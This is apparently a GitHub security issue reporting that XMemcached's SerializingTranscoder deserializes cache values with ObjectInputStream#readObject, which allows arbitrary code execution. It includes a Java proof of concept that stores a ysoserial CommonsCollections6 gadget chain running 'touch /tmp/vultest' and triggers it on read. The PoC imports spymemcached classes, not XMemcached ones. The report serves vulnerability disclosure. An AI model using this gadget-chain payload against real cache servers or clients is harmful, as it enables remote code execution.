[security] XMemcached deserialization vulnerability
kevin1993s opened this issue · comments
XMemcached supports a series of transcoders, and they all have a decode method that implements getting different types of cache data. But the SerializingTranscoder uses the deserialize method, and the deserialize method of BaseSerializingTranscoder uses ObjectInputStream#readObject. So if the cache data is an evil object, when the client attempts to get the value, it can execute arbitrary Java code.
PoC:
```java
// Imports for the client API used by this PoC.
import net.spy.memcached.AddrUtil;
import net.spy.memcached.ConnectionFactoryBuilder;
import net.spy.memcached.ConnectionFactoryBuilder.Protocol;
import net.spy.memcached.MemcachedClient;
import net.spy.memcached.auth.AuthDescriptor;
import net.spy.memcached.internal.OperationFuture;
import ysoserial.payloads.CommonsCollections6;

// ... host, port, user, password, expireTime and the AuthDescriptor ad are defined here

// Gadget chain built with ysoserial; the command runs when the object is deserialized.
Object evilObject = new CommonsCollections6().getObject("touch /tmp/vultest");

MemcachedClient cache = null;
cache = new MemcachedClient(new ConnectionFactoryBuilder().setProtocol(Protocol.BINARY).setAuthDescriptor(ad).build(),
        AddrUtil.getAddresses(host + ":" + port));

// Store the serialized gadget chain as an ordinary cache value.
OperationFuture<Boolean> future = cache.set("testKey", expireTime, evilObject);
future.get();

// Reading it back goes through the transcoder's decode, i.e. ObjectInputStream#readObject,
// which executes the payload on the client.
cache.get("testKey");
```
In many cloud service scenarios, they provide the NoSQL managed service online; if they use SerializingTranscoder, it will be dangerous.
I think you should not expose the backend cache system to users directly; if you do that, you have such a security problem.